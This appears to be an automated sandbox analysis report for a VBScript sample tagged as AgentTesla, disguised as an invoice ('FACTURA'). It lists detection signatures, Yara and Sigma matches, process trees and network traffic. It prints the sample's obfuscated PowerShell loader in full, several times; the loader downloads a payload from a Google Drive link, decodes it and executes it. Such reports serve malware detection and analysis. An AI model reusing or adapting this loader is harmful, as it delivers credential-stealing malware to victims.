Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
FACTURA 130424435.vbs

Overview

General Information

Sample name:FACTURA 130424435.vbs
Analysis ID:1427933
MD5:361f71c64cdcf7f56f8e6c2389401b89
SHA1:315b4b37555a2b0f82837a94753fbd36bad2f5fd
SHA256:dbc99b1d313999e21fd15d8386d69d56067c2a578c9658fbff8f749e93f04eae
Tags:AgentTeslavbs
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 3900 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA 130424435.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1644 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+=(6)){$taxmen+=$gejstligt.$Painters21.Invoke($Antisnapper, $Epidydimus);}$taxmen;}function cairned($Fremvisningen){. ($Chantors) ($Fremvisningen);}$Veteraness=Antimeningococcic 'ManitMNeph,oNringzregili.hiotlAspirlMet.raKlis,/ Un.e5Svam,. Afvi0Bryde Hjlp(ThundWFemmliKoo.dnServidAlkohoVetuswGlaiesTaare TtsluNDdfdsTOvern erhve1Ambas0 vatp.Therm0Quito;Caul Nonl WLinieiRe,ubnCarah6Feabe4Finia;Malac .apeixL,lla6Re,ro4Ungar;Pre.n NoterGastrvAgmas:bazzi1Tr.me2 Neph1Spe,l.N ter0Sev.r)Velve RepriG CelievasalcChon.kPampaorecta/Okkup2Prs,r0Radom1Entoc0Vov,d0Nonst1Hemag0,aama1 ksam FamilFUdadriRidgir NotceCh.llfCenoso .rorxCoons/ Warn1F.mte2Skede1Udgif.Ties.0Solip ';$Maskinafdelinger=Antimeningococcic 'IndviU,ablesDomineBrou,r Blok-TabifAnuculgSeksee ,ccenHandbtOutbu ';$Trngendes=Antimeningococcic ' AlpehDurditAfbrytTagliphabilsKal,i:Super/Dee,d/Feticd Showr CymoiLokalvReheae lant. Tvrfg tjsvo Flado ResogSe,iclSaf,aeSpiro.Lnpolc GilloNive mUntan/c viluPate cWa,tr?SmelteConquxSp itpSta,doServir O.ert ramp=BoldhdGeon.ogriotw IndknTromllAffreo diskaUdmand.orti&PhylliDe.rwdTaint=Nonp,1 Pinn0InddanAktivj LarmVKoombWCatalCbn.elqag.ip2 Undeq kos kNonreM.anscZ eddyzMiniakArticlAfkogk PoveAArdeaM WiseX,alinZVenge6Epit TPenge1Recla5,entrjVek,lTLevneP nder2 glycRVinhakRaakrbSamfuHPont. ';$Skulapstavs=Antimeningococcic 'Delig>Crash ';$Chantors=Antimeningococcic 'FlymeiMasoneHash.xShei ';$Anniversariness = Antimeningococcic 'no.mae Sta,cBassoh.gpaaoUdv.k Symp% Wi,daS,mfupMisr,pMedendHa niaSystetOverfaMotst% .ryd\BadesCAnt.caBe alb .esaa,repssHuskesMalguoForesuEvolu.FungiTStatsuPoundnOpst Palae&disku&Chain cretaeRadiocSarcohBegrao Arar Anato$Divis ';cairned (Antimeningococcic 'Unim $Afvu,gHenk,lOve eoGallib PreaaExinglHilbe:LlebrT,entroFort s PahacOversaRamifn Ana aOmski=Tor i(AntalcAc.mpmIdeendTalel Nylon/rif,ec Vamb korru$ AgarA sychnWinten Phoniho otvdeltaeRudelrAvilasG lioa,kalmrBastkiAa,eknSol.reFortrsBlocks .agr)Subpr ');cairned (Antimeningococcic ' oshy$MoblegS.kofl Fac,o VocabTrst aKonomlPipin:,elchLtidssyCellanO,iefn For eBrnd dSynodsSaddelA.iata,orbrgrevesePreasnGaranedesi.s Anjo1Sku k6Black=Affal$ KommTSae nrE,astnNedrigAiluregodsen.rypad TerreLdigesUnref.BjergsEk,popJorddlA retiStrantManag(Cuber$B gaeSCarlyk Counu R,tulSlacka TriapFucussLancetLampeaNeutrvSa mesTral.)Septa ');$Trngendes=$Lynnedslagenes16[0];cairned (Antimeningococcic '.ubgo$EpiskgIn.asl ,tamoSuprab Infoa.esoelThe,r:FniscM.echaeOpkrvtAerataKretslH,elclGaussiSub efRegalaRic.icsh oott.geru.irkerBeco e Anar= Afg NForgre DryrwAuric-Anlg OAm hibtangajFs,ebe AmulcHvalptGroun FriedST nefyForfasEngratBlodmeThrummortho. aludNpropoeDomsttPa ad.AgouaWJobb eFletsbSamliC appllChis.i ErkleBogbin .liftPr,oc ');cairned (Antimeningococcic ' Di,t$JochuM,uktieButtytSvagha Hus,lTronplKultuiSugenftod laudvikcMerist HoveuMa,kirsextuePl.st.SekteHSkovbeTilbjaBe.ald matee Stalr.rivasSyzy [ Fusi$ zithM BaroaBaaddsRetiak onciStradnSpdbraA,odifDriftdLgdereH,brilKthibiT.kepnVggengVersieIdiotrLsten] Anth=Cytop$Muls.VInequeFyrintBo.hoe indirOpga.aEri.cnBolige Res s nysks ande ');$Demonstrerbares212=Antimeningococcic ' DeliM sildeGavebt Bomba pre,lProdul Medli TrstfOutpoaEduc cPlesktFootsu D ferCompleRefer.Spin,DPanscoMultiw PercnWindslBevbnoEpictaungdodTjeneF Edr ichabolUndereSlagb(Sub,e$FaenoTischirButo,nunireg PlejeBegrunNonskdAffe.eCutarsScimi,El.os$ ulvSkondes ombyte eazeSkarlrPredes otakEctopiFodb,belekteAttessB,ase) Bucc ';$Demonstrerbares212=$Toscana[1]+$Demonstrerbares212;$Ssterskibes=$Toscana[0];cairned (Antimeningococcic 'Sub a$Anflyg mpilun.ino SkrabSjuskaGalehlData,:BaglaSTripovProluoHe tyvInterlBarrapSaliclTro,seA jur= R ad(FgridTUnpa eAfknasTiaart Ster-enthrPSeizuaScopetItalihbegso Polyg$Err.tS,horesRetartStipeeMicrorGenfosminimkChattiStrikbKojaneDukkes ive)ka,ve ');while (!$Svovlple) {cairned (Antimeningococcic ' Sona$ Bi lgEpexelOmbygoS mpabMisc,aHervalTharb:Milkwa Uncel LedilFors.eMegawrA bilgBrystiEnd rsTubulkUndereJusti=Tragi$ ForltAffekr petiuUdbenefrer. ') ;cairned $Demonstrerbares212;cairned (Antimeningococcic 'VitelSb,odetCapitaThougrWispltBadel-FiberS IntelL ftfeFibroe PartpUindf D.age4Akter ');cairned (Antimeningococcic ' Svar$ForsygO tstl.orbioPla sbAccelaAm,lelBegga:C,ndeSBotanvPirrio orgivHrecelHeb,opHyperlQuotee ,ltr=Skvad(HolomTBordvetrapdsFlaprt cica-panatPC.eriaRser.tg,lloh Dis Ratem$B.skaS .etssOm,egt Patce.hamarBordesMiddekUdforiS ndebGast e I,dgs un o)Overl ') ;cairned (Antimeningococcic 'A ter$huffmg BrnelVindko alkubsvmmeaPe.fol,ikol:Overgb undeu HassgDroutsHlhjde,ortyrBlaaseS,kketBostt=Optak$ fa cg SvoglTaurooForhobLame.aTeknolWesse:SpaniH Le.evUninviGa.indFrikttJordsnReacciLysesnCl,mog ournecandlrReshanBortfePakke+Pecha+By el% Ndud$ NoniLU plyyMessin StrenIncineCentedT rbasHypoclEnfana PhysgVenipeTrag npseu,e,transConfe1Unhe,6 Span.Grif,cHaando MannuTjrslnGunsttPrpar ') ;$Trngendes=$Lynnedslagenes16[$bugseret];}cairned (Antimeningococcic 'Tilba$CatapgDejeclWaysioContobErgoma Mot lBandl:NonreC licehHurtir Lg,koDulutmApproeT ivlpmeddllSan taTh,matUncu.eOve.rdBasal atro = Alis OrddaGBak.de MidttRicke-BlafrCPrecioreh.bnflappt Pas,e,aedanDudlettrprv Unart$PrismSMalaxsMeliot Carbe,onfor Appesstay k SamoiMarrob Supee phars A in ');cairned (Antimeningococcic 'T.rap$PraedgVlgerlUnprooBuks.bSta,sasoc,olFl,me:,ichlD Kropo Slagedermo Anglo=Pru.t ,romi[Squi.S SmalyForslsM liet heateF rtimDunde. TroeCTinfooP litnChubbv ammeeLder,r C.nvtSl,ve].olyc:smelt: S.brF JenbrPompsosognemOctoaB MezuaDriftsEmblee Debi6Besky4Caco,S ispetGlendr Gr diChantn,raktg Shop(Au or$S steCCumbrh DisprK.ldkoRescimOdileeVr,iapC taglOmegnaSanittConfeePirkldAro.a)Zoril ');cairned (Antimeningococcic ' U,fl$Snickg Belul.annioC.rysbdefa,aTrvarlPreco: OmelWBrutaiZa.zutSchtihGenaunPrinsaCont,y Ugen Omar.=Aconi Drows[AreteSUdby yZi,zasTr.klt OvereAnthrmFje.n. ilbuTTaggeeNarcox .vertSa sr. Kon.EBochen SkelcSt,rnoReexpdbi.oiiPre onPaga gefter]Scra :Samti:J venAHerreSunderCth.rmIC iasIIrked. OverGMicroe .nditInspiSLd,amt Pla,rTussoiparamnHet,agJordl( Afme$ LageD Hytvo gelsebaand)Spytk ');cairned (Antimeningococcic 'Sinec$CuspygLiderlSineboR,ngeb vareaT.gthlAf,it:NegerHFrifiaStikkr En reAndensProagkNonpeaNo.liaswi hr Lobesforpu= r.al$Sk.leWSn.taiXylyltRejs,hAutocn issaUpbanyVi.se.Beechs AnaluFilmubTergesciv.lt Er,ir KrysiScripn DestgA non(Ce lp3Hiv.u0 Hvin1Merri6 Samt8 ues5Praes,,arbo2Baiss8Chifr3Outro0B,nzi4elect) Sani ');cairned $Hareskaars;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1628 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cabassou.Tun && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 1644INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x60680:$b2: ::FromBase64String(
  • 0x6227c:$b2: ::FromBase64String(
  • 0x7796d:$b2: ::FromBase64String(
  • 0x77a74:$b2: ::FromBase64String(
  • 0x20eb94:$b2: ::FromBase64String(
  • 0x20ebc7:$b2: ::FromBase64String(
  • 0x20ebfb:$b2: ::FromBase64String(
  • 0x20ec30:$b2: ::FromBase64String(
  • 0x20ec66:$b2: ::FromBase64String(
  • 0x20ec9d:$b2: ::FromBase64String(
  • 0x20ecd5:$b2: ::FromBase64String(
  • 0x20ed0e:$b2: ::FromBase64String(
  • 0x20ed48:$b2: ::FromBase64String(
  • 0x20ed83:$b2: ::FromBase64String(
  • 0x20edbf:$b2: ::FromBase64String(
  • 0x20edfc:$b2: ::FromBase64String(
  • 0x20ee3a:$b2: ::FromBase64String(
  • 0x20ee79:$b2: ::FromBase64String(
  • 0x20eeb9:$b2: ::FromBase64String(
  • 0x20f007:$b2: ::FromBase64String(
  • 0x28d6e6:$b2: ::FromBase64String(
SourceRuleDescriptionAuthorStrings
amsi64_1644.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xe225:$b2: ::FromBase64String(
  • 0xd24b:$s1: -join
  • 0x69f7:$s4: +=
  • 0x6ab9:$s4: +=
  • 0xace0:$s4: +=
  • 0xcdfd:$s4: +=
  • 0xd0e7:$s4: +=
  • 0xd22d:$s4: +=
  • 0xf658:$s4: +=
  • 0xf6d8:$s4: +=
  • 0xf79e:$s4: +=
  • 0xf81e:$s4: +=
  • 0xf9f4:$s4: +=
  • 0xfa78:$s4: +=
  • 0xda2d:$e4: Get-WmiObject
  • 0xdc1c:$e4: Get-Process
  • 0xdc74:$e4: Start-Process

System Summary

barindex
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+=(6)){$taxmen+=$gejstligt.$Painters21.Invoke($Antisnapper, $Epidydimus);}$taxmen;}function cairned($Fremvisningen){. ($Chantors) ($Fremvisningen);}$Veteraness=Antimeningococcic 'ManitMNeph,oNringzregili.hiotlAspirlMet.raKlis,/ Un.e5Svam,. Afvi0Bryde Hjlp(ThundWFemmliKoo.dnServidAlkohoVetuswGlaiesTaare TtsluNDdfdsTOvern erhve1Ambas0 vatp.Therm0Quito;Caul Nonl WLinieiRe,ubnCarah6Feabe4Finia;Malac .apeixL,lla6Re,ro4Ungar;Pre.n NoterGastrvAgmas:bazzi1Tr.me2 Neph1Spe,l.N ter0Sev.r)Velve RepriG CelievasalcChon.kPampaorecta/Okkup2Prs,r0Radom1Entoc0Vov,d0Nonst1Hemag0,aama1 ksam FamilFUdadriRidgir NotceCh.llfCenoso .rorxCoons/ Warn1F.mte2Skede1Udgif.Ties.0Solip ';$Maskinafdelinger=Antimeningococcic 'IndviU,ablesDomineBrou,r Blok-TabifAnuculgSeksee ,ccenHandbtOutbu ';$Trngendes=Antimeningococcic ' AlpehDurditAfbrytTagliphabilsKal,i:Super/Dee,d/Feticd Showr CymoiLokalvReheae lant. Tvrfg tjsvo Flado ResogSe,iclSaf,aeSpiro.Lnpolc GilloNive mUntan/c viluPate cWa,tr?SmelteConquxSp itpSta,doServir O.ert ramp=BoldhdGeon.ogriotw IndknTromllAffreo diskaUdmand.orti&PhylliDe.rwdTaint=Nonp,1 Pinn0InddanAktivj LarmVKoombWCatalCbn.elqag.ip2 Undeq kos kNonreM.anscZ eddyzMiniakArticlAfkogk PoveAArdeaM WiseX,alinZVenge6Epit TPenge1Recla5,entrjVek,lTLevneP nder2 glycRVinhakRaakrbSamfuHPont. ';$Skulapstavs=Antimeningococcic 'Delig>Crash ';$Chantors=Antimeningococcic 'FlymeiMasoneHash.xShei ';$Anniversariness = Antimeningococcic 'no.mae Sta,cBassoh.gpaaoUdv.k Symp% Wi,daS,mfupMisr,pMedendHa niaSystetOverfaMotst% .ryd\BadesCAnt.caBe alb .esaa,repssHuskesMalguoForesuEvolu.FungiTStatsuPoundnOpst Palae&disku&Chain cretaeRadiocSarcohBegrao Arar Anato$Divis ';cairned (Antimeningococcic 'Unim $Afvu,gHenk,lOve eoGallib PreaaExinglHilbe:LlebrT,entroFort s PahacOversaRamifn Ana aOmski=Tor i(AntalcAc.mpmIdeendTalel Nylon/rif,ec Vamb korru$ AgarA sychnWinten Phoniho otvdeltaeRudelrAvilasG lioa,kalmrBastkiAa,eknSol.reFortrsBlocks .agr)Subpr ');cairned (Antimeningococcic ' oshy$MoblegS.kofl Fac,o VocabTrst aKonomlPipin:,elchLtidssyCellanO,iefn For eBrnd dSynodsSaddelA.iata,orbrgrevesePreasnGaranedesi.s Anjo1Sku k6Black=Affal$ KommTSae nrE,astnNedrigAiluregodsen.rypad TerreLdigesUnref.BjergsEk,popJorddlA retiStrantManag(Cuber$B gaeSCarlyk Counu R,tulSlacka TriapFucussLancetLampeaNeutrvSa mesTral.)Septa ');$Trngendes=$Lynnedslagenes16[0];cairned (Antimeningococcic '.ubgo$EpiskgIn.asl ,tamoSuprab Infoa.esoelThe,r:FniscM.echaeOpkrvtAerataKretslH,elclGaussiSub efRegalaRic.icsh oott.geru.irkerBeco e Anar= Afg NForgre DryrwAuric-Anlg OAm hibtangajFs,ebe AmulcHvalptGroun FriedST nefyForfasEngratBlodmeThrummortho. aludNpropoeDomsttPa ad.AgouaWJobb eFletsbSamliC appllChis.i ErkleBogbin .liftPr,oc ');cairned (Antimeningococcic ' Di,
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+=(6)){$taxmen+=$gejstligt.$Painters21.Invoke($Antisnapper, $Epidydimus);}$taxmen;}function cairned($Fremvisningen){. ($Chantors) ($Fremvisningen);}$Veteraness=Antimeningococcic 'ManitMNeph,oNringzregili.hiotlAspirlMet.raKlis,/ Un.e5Svam,. Afvi0Bryde Hjlp(ThundWFemmliKoo.dnServidAlkohoVetuswGlaiesTaare TtsluNDdfdsTOvern erhve1Ambas0 vatp.Therm0Quito;Caul Nonl WLinieiRe,ubnCarah6Feabe4Finia;Malac .apeixL,lla6Re,ro4Ungar;Pre.n NoterGastrvAgmas:bazzi1Tr.me2 Neph1Spe,l.N ter0Sev.r)Velve RepriG CelievasalcChon.kPampaorecta/Okkup2Prs,r0Radom1Entoc0Vov,d0Nonst1Hemag0,aama1 ksam FamilFUdadriRidgir NotceCh.llfCenoso .rorxCoons/ Warn1F.mte2Skede1Udgif.Ties.0Solip ';$Maskinafdelinger=Antimeningococcic 'IndviU,ablesDomineBrou,r Blok-TabifAnuculgSeksee ,ccenHandbtOutbu ';$Trngendes=Antimeningococcic ' AlpehDurditAfbrytTagliphabilsKal,i:Super/Dee,d/Feticd Showr CymoiLokalvReheae lant. Tvrfg tjsvo Flado ResogSe,iclSaf,aeSpiro.Lnpolc GilloNive mUntan/c viluPate cWa,tr?SmelteConquxSp itpSta,doServir O.ert ramp=BoldhdGeon.ogriotw IndknTromllAffreo diskaUdmand.orti&PhylliDe.rwdTaint=Nonp,1 Pinn0InddanAktivj LarmVKoombWCatalCbn.elqag.ip2 Undeq kos kNonreM.anscZ eddyzMiniakArticlAfkogk PoveAArdeaM WiseX,alinZVenge6Epit TPenge1Recla5,entrjVek,lTLevneP nder2 glycRVinhakRaakrbSamfuHPont. ';$Skulapstavs=Antimeningococcic 'Delig>Crash ';$Chantors=Antimeningococcic 'FlymeiMasoneHash.xShei ';$Anniversariness = Antimeningococcic 'no.mae Sta,cBassoh.gpaaoUdv.k Symp% Wi,daS,mfupMisr,pMedendHa niaSystetOverfaMotst% .ryd\BadesCAnt.caBe alb .esaa,repssHuskesMalguoForesuEvolu.FungiTStatsuPoundnOpst Palae&disku&Chain cretaeRadiocSarcohBegrao Arar Anato$Divis ';cairned (Antimeningococcic 'Unim $Afvu,gHenk,lOve eoGallib PreaaExinglHilbe:LlebrT,entroFort s PahacOversaRamifn Ana aOmski=Tor i(AntalcAc.mpmIdeendTalel Nylon/rif,ec Vamb korru$ AgarA sychnWinten Phoniho otvdeltaeRudelrAvilasG lioa,kalmrBastkiAa,eknSol.reFortrsBlocks .agr)Subpr ');cairned (Antimeningococcic ' oshy$MoblegS.kofl Fac,o VocabTrst aKonomlPipin:,elchLtidssyCellanO,iefn For eBrnd dSynodsSaddelA.iata,orbrgrevesePreasnGaranedesi.s Anjo1Sku k6Black=Affal$ KommTSae nrE,astnNedrigAiluregodsen.rypad TerreLdigesUnref.BjergsEk,popJorddlA retiStrantManag(Cuber$B gaeSCarlyk Counu R,tulSlacka TriapFucussLancetLampeaNeutrvSa mesTral.)Septa ');$Trngendes=$Lynnedslagenes16[0];cairned (Antimeningococcic '.ubgo$EpiskgIn.asl ,tamoSuprab Infoa.esoelThe,r:FniscM.echaeOpkrvtAerataKretslH,elclGaussiSub efRegalaRic.icsh oott.geru.irkerBeco e Anar= Afg NForgre DryrwAuric-Anlg OAm hibtangajFs,ebe AmulcHvalptGroun FriedST nefyForfasEngratBlodmeThrummortho. aludNpropoeDomsttPa ad.AgouaWJobb eFletsbSamliC appllChis.i ErkleBogbin .liftPr,oc ');cairned (Antimeningococcic ' Di,
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA 130424435.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA 130424435.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA 130424435.vbs", ProcessId: 3900, ProcessName: wscript.exe
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA 130424435.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA 130424435.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\FACTURA 130424435.vbs", ProcessId: 3900, ProcessName: wscript.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+=(6)){$taxmen+=$gejstligt.$Painters21.Invoke($Antisnapper, $Epidydimus);}$taxmen;}function cairned($Fremvisningen){. ($Chantors) ($Fremvisningen);}$Veteraness=Antimeningococcic 'ManitMNeph,oNringzregili.hiotlAspirlMet.raKlis,/ Un.e5Svam,. Afvi0Bryde Hjlp(ThundWFemmliKoo.dnServidAlkohoVetuswGlaiesTaare TtsluNDdfdsTOvern erhve1Ambas0 vatp.Therm0Quito;Caul Nonl WLinieiRe,ubnCarah6Feabe4Finia;Malac .apeixL,lla6Re,ro4Ungar;Pre.n NoterGastrvAgmas:bazzi1Tr.me2 Neph1Spe,l.N ter0Sev.r)Velve RepriG CelievasalcChon.kPampaorecta/Okkup2Prs,r0Radom1Entoc0Vov,d0Nonst1Hemag0,aama1 ksam FamilFUdadriRidgir NotceCh.llfCenoso .rorxCoons/ Warn1F.mte2Skede1Udgif.Ties.0Solip ';$Maskinafdelinger=Antimeningococcic 'IndviU,ablesDomineBrou,r Blok-TabifAnuculgSeksee ,ccenHandbtOutbu ';$Trngendes=Antimeningococcic ' AlpehDurditAfbrytTagliphabilsKal,i:Super/Dee,d/Feticd Showr CymoiLokalvReheae lant. Tvrfg tjsvo Flado ResogSe,iclSaf,aeSpiro.Lnpolc GilloNive mUntan/c viluPate cWa,tr?SmelteConquxSp itpSta,doServir O.ert ramp=BoldhdGeon.ogriotw IndknTromllAffreo diskaUdmand.orti&PhylliDe.rwdTaint=Nonp,1 Pinn0InddanAktivj LarmVKoombWCatalCbn.elqag.ip2 Undeq kos kNonreM.anscZ eddyzMiniakArticlAfkogk PoveAArdeaM WiseX,alinZVenge6Epit TPenge1Recla5,entrjVek,lTLevneP nder2 glycRVinhakRaakrbSamfuHPont. ';$Skulapstavs=Antimeningococcic 'Delig>Crash ';$Chantors=Antimeningococcic 'FlymeiMasoneHash.xShei ';$Anniversariness = Antimeningococcic 'no.mae Sta,cBassoh.gpaaoUdv.k Symp% Wi,daS,mfupMisr,pMedendHa niaSystetOverfaMotst% .ryd\BadesCAnt.caBe alb .esaa,repssHuskesMalguoForesuEvolu.FungiTStatsuPoundnOpst Palae&disku&Chain cretaeRadiocSarcohBegrao Arar Anato$Divis ';cairned (Antimeningococcic 'Unim $Afvu,gHenk,lOve eoGallib PreaaExinglHilbe:LlebrT,entroFort s PahacOversaRamifn Ana aOmski=Tor i(AntalcAc.mpmIdeendTalel Nylon/rif,ec Vamb korru$ AgarA sychnWinten Phoniho otvdeltaeRudelrAvilasG lioa,kalmrBastkiAa,eknSol.reFortrsBlocks .agr)Subpr ');cairned (Antimeningococcic ' oshy$MoblegS.kofl Fac,o VocabTrst aKonomlPipin:,elchLtidssyCellanO,iefn For eBrnd dSynodsSaddelA.iata,orbrgrevesePreasnGaranedesi.s Anjo1Sku k6Black=Affal$ KommTSae nrE,astnNedrigAiluregodsen.rypad TerreLdigesUnref.BjergsEk,popJorddlA retiStrantManag(Cuber$B gaeSCarlyk Counu R,tulSlacka TriapFucussLancetLampeaNeutrvSa mesTral.)Septa ');$Trngendes=$Lynnedslagenes16[0];cairned (Antimeningococcic '.ubgo$EpiskgIn.asl ,tamoSuprab Infoa.esoelThe,r:FniscM.echaeOpkrvtAerataKretslH,elclGaussiSub efRegalaRic.icsh oott.geru.irkerBeco e Anar= Afg NForgre DryrwAuric-Anlg OAm hibtangajFs,ebe AmulcHvalptGroun FriedST nefyForfasEngratBlodmeThrummortho. aludNpropoeDomsttPa ad.AgouaWJobb eFletsbSamliC appllChis.i ErkleBogbin .liftPr,oc ');cairned (Antimeningococcic ' Di,
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
Source: FACTURA 130424435.vbsReversingLabs: Detection: 23%
Source: FACTURA 130424435.vbsVirustotal: Detection: 11%Perma Link
Source: unknownHTTPS traffic detected: 142.250.105.102:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 173.194.219.132:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: Binary string: re.pdbM source: powershell.exe, 00000002.00000002.1528482696.000001C5ECA79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1530394780.000001C5ECC94000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Core.pdbS source: powershell.exe, 00000002.00000002.1528482696.000001C5ECA79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1530197727.000001C5ECC80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb4 source: powershell.exe, 00000002.00000002.1529537443.000001C5ECAC1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.1530394780.000001C5ECCEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: b.pdbpdblib.pdb source: powershell.exe, 00000002.00000002.1528482696.000001C5ECA79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.1530394780.000001C5ECCEB000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

barindex
Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /uc?export=download&id=10njVWCq2qkMZzklkAMXZ6T15jTP2RkbH HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /download?id=10njVWCq2qkMZzklkAMXZ6T15jTP2RkbH&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /uc?export=download&id=10njVWCq2qkMZzklkAMXZ6T15jTP2RkbH HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /download?id=10njVWCq2qkMZzklkAMXZ6T15jTP2RkbH&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: drive.google.com
